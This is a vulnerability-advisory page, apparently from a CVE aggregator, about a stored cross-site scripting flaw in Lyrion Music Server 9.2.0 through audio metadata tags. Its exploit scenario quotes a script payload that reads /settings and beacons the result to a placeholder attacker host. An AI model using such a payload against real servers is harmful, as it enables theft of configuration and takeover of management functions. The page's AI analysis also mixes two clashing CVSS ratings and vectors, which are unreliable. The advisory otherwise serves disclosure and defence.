Skip to main content

Lyrion Music Server EUVD-2026-34831

| CVE-2026-50232 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-06-05 VulnCheck GHSA-v3rr-mvqc-gmm2
XSS Lyrion Music Server
5.1
CVSS 4.0 · NVD
Share

Severity by source

NVD PRIMARY
5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
P
Scope
X

Lifecycle Timeline

3
Severity Changed
Jun 05, 2026 - 14:22 NVD
HIGH MEDIUM
CVSS changed
Jun 05, 2026 - 14:22 NVD
7.2 (HIGH) 5.1 (MEDIUM)
Analysis Generated
Jun 05, 2026 - 14:15 vuln.today

DescriptionCVE.org

Lyrion Music Server 9.2.0 contains a stored cross-site scripting vulnerability that allows attackers to inject malicious scripts through media file metadata tags like GENRE, ARTIST, and ALBUM. Attackers can craft files with XSS payloads in metadata tags that execute in the web interface when users view track information or play files, enabling access to management functions and settings disclosure.

AnalysisAI

Stored cross-site scripting in Lyrion Music Server 9.2.0 allows remote attackers to inject JavaScript payloads via media file metadata fields (GENRE, ARTIST, ALBUM) that execute when other users browse the web interface. With CVSS 7.2 and a changed scope, successful exploitation can reach management functions and disclose settings. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Craft audio file with XSS in ID3 tags
Delivery
Deliver file to victim's library
Exploit
Server indexes poisoned metadata
Execution
User loads track or now-playing view
Persist
Script executes in web UI origin
Impact
Read settings and invoke management endpoints
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires that an audio file containing attacker-controlled metadata in GENRE, ARTIST, or ALBUM tags is indexed by a Lyrion Music Server 9.2.0 instance, and that a user subsequently views the track information page or plays the file through the web interface - so a victim browser session viewing the poisoned entry is the trigger, despite the CVSS UI:N rating. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS vector (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N) reflects that the payload is delivered over the network and requires no authentication or user interaction to be planted, and that the scope change captures cross-origin impact within the rendering browser; however the UI:N rating is somewhat optimistic for a stored XSS, since impact only materializes when an administrator or user views the poisoned track - most stored-XSS findings rate UI:R. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker shares or seeds an MP3/FLAC file whose ARTIST or ALBUM tag contains a payload such as <script>fetch('/settings').then(r=>r.text()).then(x=>navigator.sendBeacon('//attacker',x))</script>; the victim adds the file to their Lyrion library (directly, via a shared folder, or via a third-party download). When the owner or any authenticated user opens the track view or now-playing screen, the script executes in the server's web-UI origin and exfiltrates configuration or invokes management endpoints on the attacker's behalf.
Remediation No vendor-released patch identified at time of analysis in the supplied references, so operators should monitor the Lyrion Music Server project (LMS Community) for a fixed release beyond 9.2.0 and apply it once published; consult the VulnCheck advisory (https://www.vulncheck.com/advisories/lyrion-music-server-stored-xss-via-metadata-tags) and the Zero Science Lab advisory (https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5990.php) for ongoing updates. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 24 hours: Audit Lyrion Music Server 9.2.0 for suspicious media file metadata in GENRE, ARTIST, and ALBUM fields; restrict media file upload permissions to trusted administrators only. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-34831 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy